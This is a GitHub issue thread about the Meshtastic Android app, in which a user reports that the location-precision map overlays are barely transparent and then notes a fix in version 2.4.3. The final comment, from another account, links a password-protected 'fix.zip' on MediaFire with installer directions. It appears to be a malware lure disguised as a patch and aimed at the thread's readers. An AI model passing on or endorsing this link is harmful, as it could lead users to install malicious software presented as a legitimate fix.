### ISSUE TITLE
[Bug]: Fuzzy Location Overlays are.. barely transparent

### ISSUE THREAD

**Issue by Talie5in** [meshtastic/Meshtastic-Android#1209]
### Contact Details

@talie5in

### What happened?

Location Precision Overlays (single layer) make it near impossible to see map behind... could this be lowered to like 10% so it's not so?

![Screenshot_20240826_150909_Meshtastic](https://github.com/user-attachments/assets/b0ffba5b-ff4c-406c-a778-6cff2a5c0db9)

### App Version

2.4.2

### Phone

Galaxy S23+

### Device

Any

### Firmware

2.5.0TP2

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by Talie5in** [comment]
Deep, fixed in 2.4.3

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
